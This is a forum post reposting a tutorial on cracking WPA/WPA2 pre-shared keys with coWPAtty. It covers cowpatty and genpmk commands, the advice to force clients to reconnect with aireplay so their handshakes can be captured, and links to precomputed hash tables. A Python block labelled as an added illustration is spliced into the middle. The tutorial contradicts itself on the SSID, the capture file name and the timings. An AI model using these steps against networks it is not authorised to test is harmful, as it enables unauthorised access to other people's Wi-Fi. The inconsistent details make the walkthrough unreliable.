This post was last edited by smilebomb on 2010-1-14 23:09.
I really hate this kind of person.
coWPAtty for Windows MAIN:
"coWPAtty is designed to audit the pre-shared key (PSK) selection for WPA networks based on the TKIP protocol."
- Joshua Wright.

Project Homepage: http://www.willhackforsushi.com/Cowpatty.html

Local Mirror: Cowpatty-4.0-win32.zip
MD5: aa9ead2aacfcc493da3684351425d4c6

coWPAtty Dictionary Attack
Precomputing WPA PMK to crack WPA PSK
coWPAtty Precomputed WPA Attack
coWPAtty Precomputed WPA2 Attack
coWPAtty Tables

coWPAtty Usage:

coWPAtty Dictionary Attack:
To perform the coWPAtty dictionary attack we need to supply the tool with a capture file that includes the TKIP four-way handshake, a dictionary file of passphrases to guess with, and the SSID for the network.
In order to collect the four-way handshake you can either wait until a client joins the network or, preferably, force it to rejoin the network using tools like void11 or aireplay, and capture the handshakes using something like kismet, ethereal or airodump.

cowpatty -f dict -r wpapsk-linksys.dump -s linksys

As you can see, this simple dictionary attack took 51 seconds; we can speed up this process by precomputing the WPA-PMK to crack the WPA-PSK (see below).

wpapsk-linksys.dump is the capture containing the four-way handshake
dict is the password file
linksys is the network SSID

Precomputing WPA PMK to crack WPA PSK:
genpmk is used to precompute the hash files, in a similar way to how Rainbow tables are used to pre-hash passwords in Windows LANMan attacks. There is a slight difference in WPA, however, in that the SSID of the network is used as well as the WPA-PSK to "salt" the hash. This means that we need a different set of hashes for each and every unique SSID, i.e. a set for "linksys", a set for "tsunami", etc.

So to generate some hash files for a network using the SSID cuckoo we use:

genpmk -f dict -d linksys.hashfile -s linksys

dict is the password file
linksys.hashfile is our output file
linksys is the network ESSID

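The derivation behind both the dictionary attack and the genpmk precomputation above is the IEEE 802.11i passphrase-to-PMK mapping: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit output. The following Python is an added illustration, not code from the original post or from the coWPAtty project. It shows why a hash file is bound to one SSID and what a defender can check about their own network. The wordlist, the set of "common" SSIDs and the sample passphrases are constructed values, and audit_psk is a hypothetical helper of this example, not a coWPAtty function.

```python
import hashlib

# IEEE 802.11i passphrase-to-PMK mapping: PBKDF2-HMAC-SHA1, SSID as salt,
# 4096 iterations, 256-bit output. This is the expensive step genpmk precomputes.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 32-byte pairwise master key for a passphrase on a given SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def build_pmk_table(wordlist, ssid):
    """Precompute PMK -> passphrase for one SSID (what a genpmk hash file holds).

    Because the SSID is the salt, the table is bound to that SSID: an entry
    computed for "linksys" never matches a PMK derived on "tsunami".
    """
    return {derive_pmk(word, ssid): word for word in wordlist}


def audit_psk(ssid, passphrase, wordlist, common_ssids):
    """Hypothetical defender-side check: report why a PSK would fall to coWPAtty.

    Returns a list of findings. An empty list means neither the plain
    dictionary attack with this wordlist nor a precomputed table for a
    common SSID would recover the passphrase.
    """
    findings = []
    if ssid in common_ssids:
        findings.append("ssid-has-precomputed-tables")
    table = build_pmk_table(wordlist, ssid)
    if derive_pmk(passphrase, ssid) in table:
        findings.append("passphrase-in-wordlist")
    return findings


if __name__ == "__main__":
    # Constructed sample data, not taken from any real wordlist or table set.
    wordlist = ["password", "letmein1", "linksys1", "correcthorse"]
    common_ssids = {"linksys", "tsunami", "default"}

    # Same passphrase on two SSIDs gives two different PMKs, hence per-SSID tables.
    print(derive_pmk("password", "linksys").hex())
    print(derive_pmk("password", "tsunami").hex())

    print(audit_psk("linksys", "password", wordlist, common_ssids))
    print(audit_psk("MyHome-7f3a", "Gq8!r2Lp#vN4", wordlist, common_ssids))
```

The derivation can be checked against the published 802.11i test vector (passphrase "password", SSID "IEEE"). The cost of 4096 HMAC-SHA1 rounds per guess is also why the page's timings differ so much between the live dictionary run and the precomputed lookup: the table moves that cost off the attack path, but only for the SSIDs it was built for, which is the practical reason to avoid default SSIDs and dictionary passphrases.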
coWPAtty Precomputed WPA Attack:
Now we have created our hash file we can use it against any WPA-PSK network that is utilising a network SSID of cuckoo. Remember the capture (wpa-test-01.cap) must contain the four-way handshake to be successful.

cowpatty -d linksys.hashfile -r wpapsk-linksys.dump -s linksys

wpa-test-01.cap is the capture containing the four-way handshake
linksys.hashfile are our precomputed hashes
linksys is the network ESSID

Notice that cracking the WPA-PSK took 0.04 seconds with the pre-computed attack as opposed to 200 seconds with standard dictionary attack mode, albeit you do need to pre-compute the hash files prior to the attack. However, precomputing large hash files for common SSIDs (e.g. linksys, tsunami) would be a sensible move for most penetration testers.

coWPAtty Precomputed WPA2 Attack:
coWPAtty 4.0 is also capable of attacking WPA2 captures. Note: the same hash file as was used with the WPA capture was also used with the WPA2 capture.

cowpatty -d linksys.hashfile -r wpa2psk-linksys.dump -s linksys

wpa2psk-linksys.dump is the capture containing the four-way handshake
dict is the password file
linksys is the network SSID

coWPAtty Tables:
The Church of Wifi have produced some lookup tables for 1000 SSIDs computed against a 170,000 word password file. The resultant tables are approximately 7 Gigabytes in size and can be downloaded via Torrent:

http://torrents.lostboxen.net/co ... atty-4.0_2006-10-19/

A 33 Gigabyte set of tables is also available: http://umbra.shmoo.com:6969/

Or you can buy them on DVD, direct from Renderman (initiator of the project): http://www.renderlab.net/projects/WPA-tables/